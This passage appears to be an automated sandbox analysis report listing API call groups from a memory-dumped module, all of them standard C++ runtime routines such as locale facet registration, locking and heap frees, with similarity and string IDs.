                                                                                                                            • Part of subcall function 6E2F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E2F20A6
                                                                                                                          • collate.LIBCPMT ref: 6E3052B9
                                                                                                                          • std::_Facet_Register.LIBCPMT ref: 6E3052D0
                                                                                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 6E3052F0
                                                                                                                          • Concurrency::cancel_current_task.LIBCPMT ref: 6E3052FD
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1186225044.000000006E2E0000.00000020.00020000.sdmp, Offset: 6E2E0000, based on PE: false
                                                                                                                          Similarity
                                                                                                                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registercollate
                                                                                                                          • String ID: 8=An
                                                                                                                          • API String ID: 1767075461-2063616906
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          • __EH_prolog3.LIBCMT ref: 6E30530A
                                                                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 6E305314
                                                                                                                          • int.LIBCPMT ref: 6E30532B
                                                                                                                            • Part of subcall function 6E2F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E2F208C
                                                                                                                            • Part of subcall function 6E2F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E2F20A6
                                                                                                                          • messages.LIBCPMT ref: 6E30534E
                                                                                                                          • std::_Facet_Register.LIBCPMT ref: 6E305365
                                                                                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 6E305385
                                                                                                                          • Concurrency::cancel_current_task.LIBCPMT ref: 6E305392
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1186225044.000000006E2E0000.00000020.00020000.sdmp, Offset: 6E2E0000, based on PE: false
                                                                                                                          Similarity
                                                                                                                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registermessages
                                                                                                                          • String ID: <=An
                                                                                                                          • API String ID: 958335874-4100119773
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          • __EH_prolog3_GS.LIBCMT ref: 6E2FE172
                                                                                                                          • _Maklocstr.LIBCPMT ref: 6E2FE1DB
                                                                                                                          • _Maklocstr.LIBCPMT ref: 6E2FE1ED
                                                                                                                          • _Maklocchr.LIBCPMT ref: 6E2FE205
                                                                                                                          • _Maklocchr.LIBCPMT ref: 6E2FE215
                                                                                                                          • _Getvals.LIBCPMT ref: 6E2FE237
                                                                                                                            • Part of subcall function 6E2F688C: _Maklocchr.LIBCPMT ref: 6E2F68BB
                                                                                                                            • Part of subcall function 6E2F688C: _Maklocchr.LIBCPMT ref: 6E2F68D1
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1186225044.000000006E2E0000.00000020.00020000.sdmp, Offset: 6E2E0000, based on PE: false
                                                                                                                          Similarity
                                                                                                                          • API ID: Maklocchr$Maklocstr$GetvalsH_prolog3_
                                                                                                                          • String ID: 4r6n
                                                                                                                          • API String ID: 3549167292-711905790
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          • __EH_prolog3.LIBCMT ref: 6E305434
                                                                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 6E30543E
                                                                                                                          • int.LIBCPMT ref: 6E305455
                                                                                                                            • Part of subcall function 6E2F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E2F208C
                                                                                                                            • Part of subcall function 6E2F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E2F20A6
                                                                                                                          • std::_Facet_Register.LIBCPMT ref: 6E30548F
                                                                                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 6E3054AF
                                                                                                                          • Concurrency::cancel_current_task.LIBCPMT ref: 6E3054BC
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1186225044.000000006E2E0000.00000020.00020000.sdmp, Offset: 6E2E0000, based on PE: false
                                                                                                                          Similarity
                                                                                                                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
                                                                                                                          • String ID: D=An
                                                                                                                          • API String ID: 55977855-1525241006
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          • __EH_prolog3.LIBCMT ref: 6E3055F3
                                                                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 6E3055FD
                                                                                                                          • int.LIBCPMT ref: 6E305614
                                                                                                                            • Part of subcall function 6E2F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E2F208C
                                                                                                                            • Part of subcall function 6E2F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E2F20A6
                                                                                                                          • std::_Facet_Register.LIBCPMT ref: 6E30564E
                                                                                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 6E30566E
                                                                                                                          • Concurrency::cancel_current_task.LIBCPMT ref: 6E30567B
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1186225044.000000006E2E0000.00000020.00020000.sdmp, Offset: 6E2E0000, based on PE: false
                                                                                                                          Similarity
                                                                                                                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
                                                                                                                          • String ID: P=An
                                                                                                                          • API String ID: 55977855-2240975974
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          • __EH_prolog3.LIBCMT ref: 6E30539F
                                                                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 6E3053A9
                                                                                                                          • int.LIBCPMT ref: 6E3053C0
                                                                                                                            • Part of subcall function 6E2F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E2F208C
                                                                                                                            • Part of subcall function 6E2F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E2F20A6
                                                                                                                          • std::_Facet_Register.LIBCPMT ref: 6E3053FA
                                                                                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 6E30541A
                                                                                                                          • Concurrency::cancel_current_task.LIBCPMT ref: 6E305427
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1186225044.000000006E2E0000.00000020.00020000.sdmp, Offset: 6E2E0000, based on PE: false
                                                                                                                          Similarity
                                                                                                                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
                                                                                                                          • String ID: @=An
                                                                                                                          • API String ID: 55977855-3582706681
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          • __EH_prolog3.LIBCMT ref: 6E2F78FE
                                                                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 6E2F7908
                                                                                                                          • int.LIBCPMT ref: 6E2F791F
                                                                                                                            • Part of subcall function 6E2F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E2F208C
                                                                                                                            • Part of subcall function 6E2F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E2F20A6
                                                                                                                          • std::_Facet_Register.LIBCPMT ref: 6E2F7959
                                                                                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 6E2F7979
                                                                                                                          • Concurrency::cancel_current_task.LIBCPMT ref: 6E2F7986
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1186225044.000000006E2E0000.00000020.00020000.sdmp, Offset: 6E2E0000, based on PE: false
                                                                                                                          Similarity
                                                                                                                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
                                                                                                                          • String ID: |<An
                                                                                                                          • API String ID: 55977855-1857351383
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                            • Part of subcall function 6E32F299: GetLastError.KERNEL32(00000000,00000000,?,6E327CF9,?,?,00000003,?,6E2F1083,6E2F10F4,?,6E2F0EE0,00000000,00000000,00000000,00000004), ref: 6E32F29E
                                                                                                                            • Part of subcall function 6E32F299: SetLastError.KERNEL32(00000000,6E37A1A0,000000FF,?,6E327CF9,?,?,00000003,?,6E2F1083,6E2F10F4,?,6E2F0EE0,00000000,00000000,00000000), ref: 6E32F33C
                                                                                                                          • _free.LIBCMT ref: 6E3332BF
                                                                                                                          • _free.LIBCMT ref: 6E3332D8
                                                                                                                          • _free.LIBCMT ref: 6E333316
                                                                                                                          • _free.LIBCMT ref: 6E33331F
                                                                                                                          • _free.LIBCMT ref: 6E33332B
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1186225044.000000006E2E0000.00000020.00020000.sdmp, Offset: 6E2E0000, based on PE: false
                                                                                                                          Similarity
                                                                                                                          • API ID: _free$ErrorLast
                                                                                                                          • String ID: C
                                                                                                                          • API String ID: 3291180501-1037565863
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1186225044.000000006E2E0000.00000020.00020000.sdmp, Offset: 6E2E0000, based on PE: false
                                                                                                                          Similarity
                                                                                                                          • API ID: MaklocchrMaklocstr$H_prolog3_
                                                                                                                          • String ID: 4r6n
                                                                                                                          • API String ID: 2404127365-711905790
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                            • Part of subcall function 6E33D196: _free.LIBCMT ref: 6E33D1BB
                                                                                                                          • _free.LIBCMT ref: 6E33D4F9
                                                                                                                            • Part of subcall function 6E331434: HeapFree.KERNEL32(00000000,00000000,?,6E33D1C0,?,00000000,?,?,?,6E33D4C4,?,00000007,?,?,6E33B43B,?), ref: 6E33144A
                                                                                                                            • Part of subcall function 6E331434: GetLastError.KERNEL32(?,?,6E33D1C0,?,00000000,?,?,?,6E33D4C4,?,00000007,?,?,6E33B43B,?,?), ref: 6E33145C
                                                                                                                          • _free.LIBCMT ref: 6E33D504
                                                                                                                          • _free.LIBCMT ref: 6E33D50F
                                                                                                                          • _free.LIBCMT ref: 6E33D563
                                                                                                                          • _free.LIBCMT ref: 6E33D56E
                                                                                                                          • _free.LIBCMT ref: 6E33D579
                                                                                                                          • _free.LIBCMT ref: 6E33D584
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1186225044.000000006E2E0000.00000020.00020000.sdmp, Offset: 6E2E0000, based on PE: false
                                                                                                                          Similarity
                                                                                                                          • API ID: _free$ErrorFreeHeapLast
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 776569668-0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1186225044.000000006E2E0000.00000020.00020000.sdmp, Offset: 6E2E0000, based on PE: false
                                                                                                                          Similarity
                                                                                                                          • API ID: Maklocstr$Maklocchr
                                                                                                                          • String ID: 4r6n
                                                                                                                          • API String ID: 2020259771-711905790
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          • __EH_prolog3.LIBCMT ref: 6E2F1C9D
                                                                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 6E2F1CA7
                                                                                                                          • int.LIBCPMT ref: 6E2F1CBE
                                                                                                                            • Part of subcall function 6E2F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E2F208C
                                                                                                                            • Part of subcall function 6E2F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E2F20A6
                                                                                                                          • numpunct.LIBCPMT ref: 6E2F1CE1
                                                                                                                          • std::_Facet_Register.LIBCPMT ref: 6E2F1CF8
                                                                                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 6E2F1D18
                                                                                                                          • Concurrency::cancel_current_task.LIBCPMT ref: 6E2F1D25
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1186225044.000000006E2E0000.00000020.00020000.sdmp, Offset: 6E2E0000, based on PE: false
                                                                                                                          Similarity
                                                                                                                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registernumpunct
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3064348918-0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          • __EH_prolog3.LIBCMT ref: 6E2F7615
                                                                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 6E2F761F
                                                                                                                          • int.LIBCPMT ref: 6E2F7636
                                                                                                                            • Part of subcall function 6E2F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E2F208C
                                                                                                                            • Part of subcall function 6E2F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E2F20A6
                                                                                                                          • moneypunct.LIBCPMT ref: 6E2F7659
                                                                                                                          • std::_Facet_Register.LIBCPMT ref: 6E2F7670
                                                                                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 6E2F7690
                                                                                                                          • Concurrency::cancel_current_task.LIBCPMT ref: 6E2F769D
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1186225044.000000006E2E0000.00000020.00020000.sdmp, Offset: 6E2E0000, based on PE: false
                                                                                                                          Similarity
                                                                                                                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registermoneypunct
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3376033448-0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          • __EH_prolog3.LIBCMT ref: 6E2F76AA
                                                                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 6E2F76B4
                                                                                                                          • int.LIBCPMT ref: 6E2F76CB
                                                                                                                            • Part of subcall function 6E2F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E2F208C
                                                                                                                            • Part of subcall function 6E2F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E2F20A6
                                                                                                                          • moneypunct.LIBCPMT ref: 6E2F76EE
                                                                                                                          • std::_Facet_Register.LIBCPMT ref: 6E2F7705
                                                                                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 6E2F7725
                                                                                                                          • Concurrency::cancel_current_task.LIBCPMT ref: 6E2F7732
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1186225044.000000006E2E0000.00000020.00020000.sdmp, Offset: 6E2E0000, based on PE: false
                                                                                                                          Similarity
                                                                                                                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registermoneypunct
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3376033448-0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          • __EH_prolog3.LIBCMT ref: 6E2F773F
                                                                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 6E2F7749
                                                                                                                          • int.LIBCPMT ref: 6E2F7760
                                                                                                                            • Part of subcall function 6E2F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E2F208C
                                                                                                                            • Part of subcall function 6E2F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E2F20A6
                                                                                                                          • moneypunct.LIBCPMT ref: 6E2F7783
                                                                                                                          • std::_Facet_Register.LIBCPMT ref: 6E2F779A
                                                                                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 6E2F77BA
                                                                                                                          • Concurrency::cancel_current_task.LIBCPMT ref: 6E2F77C7
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1186225044.000000006E2E0000.00000020.00020000.sdmp, Offset: 6E2E0000, based on PE: false
                                                                                                                          Similarity
                                                                                                                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registermoneypunct
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3376033448-0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          • __EH_prolog3.LIBCMT ref: 6E2F6F19
                                                                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 6E2F6F23
                                                                                                                          • int.LIBCPMT ref: 6E2F6F3A
                                                                                                                            • Part of subcall function 6E2F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E2F208C
                                                                                                                            • Part of subcall function 6E2F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E2F20A6
                                                                                                                          • codecvt.LIBCPMT ref: 6E2F6F5D
                                                                                                                          • std::_Facet_Register.LIBCPMT ref: 6E2F6F74
                                                                                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 6E2F6F94
                                                                                                                          • Concurrency::cancel_current_task.LIBCPMT ref: 6E2F6FA1
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1186225044.000000006E2E0000.00000020.00020000.sdmp, Offset: 6E2E0000, based on PE: false
                                                                                                                          Similarity
                                                                                                                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registercodecvt
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2133458128-0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          • __EH_prolog3.LIBCMT ref: 6E2F6FAE
                                                                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 6E2F6FB8
                                                                                                                          • int.LIBCPMT ref: 6E2F6FCF
                                                                                                                            • Part of subcall function 6E2F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E2F208C
                                                                                                                            • Part of subcall function 6E2F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E2F20A6
                                                                                                                          • codecvt.LIBCPMT ref: 6E2F6FF2
                                                                                                                          • std::_Facet_Register.LIBCPMT ref: 6E2F7009
                                                                                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 6E2F7029
                                                                                                                          • Concurrency::cancel_current_task.LIBCPMT ref: 6E2F7036
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1186225044.000000006E2E0000.00000020.00020000.sdmp, Offset: 6E2E0000, based on PE: false
                                                                                                                          Similarity
                                                                                                                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registercodecvt
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2133458128-0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          • __EH_prolog3.LIBCMT ref: 6E2F77D4
                                                                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 6E2F77DE
                                                                                                                          • int.LIBCPMT ref: 6E2F77F5
                                                                                                                            • Part of subcall function 6E2F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E2F208C
                                                                                                                            • Part of subcall function 6E2F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E2F20A6
                                                                                                                          • moneypunct.LIBCPMT ref: 6E2F7818
                                                                                                                          • std::_Facet_Register.LIBCPMT ref: 6E2F782F
                                                                                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 6E2F784F
                                                                                                                          • Concurrency::cancel_current_task.LIBCPMT ref: 6E2F785C
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1186225044.000000006E2E0000.00000020.00020000.sdmp, Offset: 6E2E0000, based on PE: false
                                                                                                                          Similarity
                                                                                                                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registermoneypunct
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3376033448-0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          • __EH_prolog3.LIBCMT ref: 6E2F1A49
                                                                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 6E2F1A53
                                                                                                                          • int.LIBCPMT ref: 6E2F1A6A
                                                                                                                            • Part of subcall function 6E2F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E2F208C
                                                                                                                            • Part of subcall function 6E2F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E2F20A6
                                                                                                                          • codecvt.LIBCPMT ref: 6E2F1A8D
                                                                                                                          • std::_Facet_Register.LIBCPMT ref: 6E2F1AA4
                                                                                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 6E2F1AC4
                                                                                                                          • Concurrency::cancel_current_task.LIBCPMT ref: 6E2F1AD1
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1186225044.000000006E2E0000.00000020.00020000.sdmp, Offset: 6E2E0000, based on PE: false
                                                                                                                          Similarity
                                                                                                                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registercodecvt
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2133458128-0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          • __EH_prolog3.LIBCMT ref: 6E2F7ABD
                                                                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 6E2F7AC7
                                                                                                                          • int.LIBCPMT ref: 6E2F7ADE
                                                                                                                            • Part of subcall function 6E2F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E2F208C
                                                                                                                            • Part of subcall function 6E2F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E2F20A6
                                                                                                                          • numpunct.LIBCPMT ref: 6E2F7B01
                                                                                                                          • std::_Facet_Register.LIBCPMT ref: 6E2F7B18
                                                                                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 6E2F7B38
                                                                                                                          • Concurrency::cancel_current_task.LIBCPMT ref: 6E2F7B45
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1186225044.000000006E2E0000.00000020.00020000.sdmp, Offset: 6E2E0000, based on PE: false
                                                                                                                          Similarity
                                                                                                                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registernumpunct
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3064348918-0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          • __EH_prolog3.LIBCMT ref: 6E2F7297
                                                                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 6E2F72A1
                                                                                                                          • int.LIBCPMT ref: 6E2F72B8
                                                                                                                            • Part of subcall function 6E2F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E2F208C
                                                                                                                            • Part of subcall function 6E2F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E2F20A6
                                                                                                                          • messages.LIBCPMT ref: 6E2F72DB
                                                                                                                          • std::_Facet_Register.LIBCPMT ref: 6E2F72F2
                                                                                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 6E2F7312
                                                                                                                          • Concurrency::cancel_current_task.LIBCPMT ref: 6E2F731F
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1186225044.000000006E2E0000.00000020.00020000.sdmp, Offset: 6E2E0000, based on PE: false
                                                                                                                          Similarity
                                                                                                                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registermessages
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 958335874-0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          • __EH_prolog3.LIBCMT ref: 6E2F1ADE
                                                                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 6E2F1AE8
                                                                                                                          • int.LIBCPMT ref: 6E2F1AFF
                                                                                                                            • Part of subcall function 6E2F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E2F208C
                                                                                                                            • Part of subcall function 6E2F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E2F20A6
                                                                                                                          • ctype.LIBCPMT ref: 6E2F1B22
                                                                                                                          • std::_Facet_Register.LIBCPMT ref: 6E2F1B39
                                                                                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 6E2F1B59
                                                                                                                          • Concurrency::cancel_current_task.LIBCPMT ref: 6E2F1B66
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1186225044.000000006E2E0000.00000020.00020000.sdmp, Offset: 6E2E0000, based on PE: false
                                                                                                                          Similarity
                                                                                                                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registerctype
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          • __EH_prolog3.LIBCMT ref: 6E2F732C
                                                                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 6E2F7336
                                                                                                                          • int.LIBCPMT ref: 6E2F734D
                                                                                                                            • Part of subcall function 6E2F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E2F208C
                                                                                                                            • Part of subcall function 6E2F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E2F20A6
                                                                                                                          • messages.LIBCPMT ref: 6E2F7370
                                                                                                                          • std::_Facet_Register.LIBCPMT ref: 6E2F7387
                                                                                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 6E2F73A7
                                                                                                                          • Concurrency::cancel_current_task.LIBCPMT ref: 6E2F73B4
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1186225044.000000006E2E0000.00000020.00020000.sdmp, Offset: 6E2E0000, based on PE: false
                                                                                                                          Similarity
                                                                                                                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registermessages
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          • __EH_prolog3.LIBCMT ref: 6E2F7B52
                                                                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 6E2F7B5C
                                                                                                                          • int.LIBCPMT ref: 6E2F7B73
                                                                                                                            • Part of subcall function 6E2F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E2F208C
                                                                                                                            • Part of subcall function 6E2F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E2F20A6
                                                                                                                          • numpunct.LIBCPMT ref: 6E2F7B96
                                                                                                                          • std::_Facet_Register.LIBCPMT ref: 6E2F7BAD
                                                                                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 6E2F7BCD
                                                                                                                          • Concurrency::cancel_current_task.LIBCPMT ref: 6E2F7BDA
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1186225044.000000006E2E0000.00000020.00020000.sdmp, Offset: 6E2E0000, based on PE: false
                                                                                                                          Similarity
                                                                                                                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registernumpunct
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          • __EH_prolog3.LIBCMT ref: 6E2F7043
                                                                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 6E2F704D
                                                                                                                          • int.LIBCPMT ref: 6E2F7064
                                                                                                                            • Part of subcall function 6E2F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E2F208C
                                                                                                                            • Part of subcall function 6E2F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E2F20A6
                                                                                                                          • collate.LIBCPMT ref: 6E2F7087
                                                                                                                          • std::_Facet_Register.LIBCPMT ref: 6E2F709E
                                                                                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 6E2F70BE
                                                                                                                          • Concurrency::cancel_current_task.LIBCPMT ref: 6E2F70CB
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1186225044.000000006E2E0000.00000020.00020000.sdmp, Offset: 6E2E0000, based on PE: false
                                                                                                                          Similarity
                                                                                                                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registercollate
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          • __EH_prolog3.LIBCMT ref: 6E2F70D8
                                                                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 6E2F70E2
                                                                                                                          • int.LIBCPMT ref: 6E2F70F9
                                                                                                                            • Part of subcall function 6E2F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E2F208C
                                                                                                                            • Part of subcall function 6E2F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E2F20A6
                                                                                                                          • collate.LIBCPMT ref: 6E2F711C
                                                                                                                          • std::_Facet_Register.LIBCPMT ref: 6E2F7133
                                                                                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 6E2F7153
                                                                                                                          • Concurrency::cancel_current_task.LIBCPMT ref: 6E2F7160
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1186225044.000000006E2E0000.00000020.00020000.sdmp, Offset: 6E2E0000, based on PE: false
                                                                                                                          Similarity
                                                                                                                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registercollate
                                                                                                                          Uniqueness

